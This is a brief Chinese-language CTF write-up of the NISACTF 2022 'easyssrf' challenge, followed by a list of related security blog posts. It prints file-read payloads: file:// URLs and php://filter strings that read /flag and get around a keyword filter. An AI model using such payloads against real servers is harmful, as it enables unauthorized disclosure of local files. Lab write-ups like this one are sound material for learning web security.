[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
Chengbei116 小时前
一站式源码安全检测工具、云安全 / APP / 小程序源码敏感信息递归多层目录扫描AK、JWT、手机号、身份证等敏感信息
java·开发语言·安全·web安全·网络安全·系统安全·安全架构
沄媪9 小时前
CSRF 跨站请求伪造
前端·ctf·csrf
谪星·阿凯14 小时前
后渗透痕迹清理实战指南
网络安全·后渗透清理
大方子14 小时前
【好靶场】他被什么加固了2?
网络安全·好靶场
大方子17 小时前
【好靶场】他被什么加固了1?
网络安全·好靶场
沄媪18 小时前
XSS 跨站脚本攻击
前端·ctf·xss
沄媪18 小时前
反序列化漏洞
ctf·反序列化
大方子18 小时前
【PolarCTF】upload1
网络安全·polarctf
大方子20 小时前
【PolarCTF】rapyiquan
网络安全·polarctf
锐速网络20 小时前
SaaS云防护:DDoS/CC/爬虫一站式解决方案
网络安全·云waf·ddos防护·企业网站防护·saas云防护·cc攻击防护·恶意爬虫拦截